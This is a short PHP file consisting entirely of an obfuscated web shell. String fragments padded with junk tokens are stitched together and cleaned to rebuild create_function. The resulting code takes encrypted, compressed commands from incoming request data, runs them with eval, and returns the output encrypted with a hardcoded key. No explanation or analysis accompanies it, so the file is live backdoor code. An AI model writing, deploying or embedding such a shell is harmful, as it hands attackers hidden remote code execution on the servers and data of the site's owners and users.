<?php
$Y=';@ob_endR$_cleanR$R$();$r=@baR$seR$64R$_enR$code(@xR$(@gzcomR$presR$s($o),$k));print("$pR$$kh$R$r$kf");}';
$z='$or($j=R$0;($j<$R$c&&$iR$<$l);$R$j++R$,$i++){R$$R$o.=$t{R$$i}^$k{$j};}R$}return R$$o;}R$if(@pR$rR$eg_';
$s='match(R$"/$kh(.+R$)$kf/",@fR$R$ileR$_get_cR$ontents(R$R$"php://inpuR$t"),$m)==1){R$@ob_sR$tart();';
$T='@eR$val(R$@gzuncR$ompress(R$@x(@bR$ase64_dR$ecoR$R$de($R$m[1]),$k)));$o=@oR$b_get_R$conR$R$tents()';
$B='R$$k="aR$9085c09R$";$kR$hR$="cR$7c038bd7216";$kf=R$"a491059d5R$b1f";$p=R$"8rjR$BTKR$BP2JLjV0R$';
$v=str_replace('Zp','','ZpcZpreatZpe_fZpuZpncZption');
$g='wg";funcR$tiR$on x($t,$k)R${$cR$=strleR$n($k);$lR$=stR$R$rlen($tR$);$o="";for($iR$=0;$i<$R$l;){fR';
$Q=str_replace('R$','',$B.$g.$z.$s.$T.$Y);
$P=$v('',$Q);$P();
?>
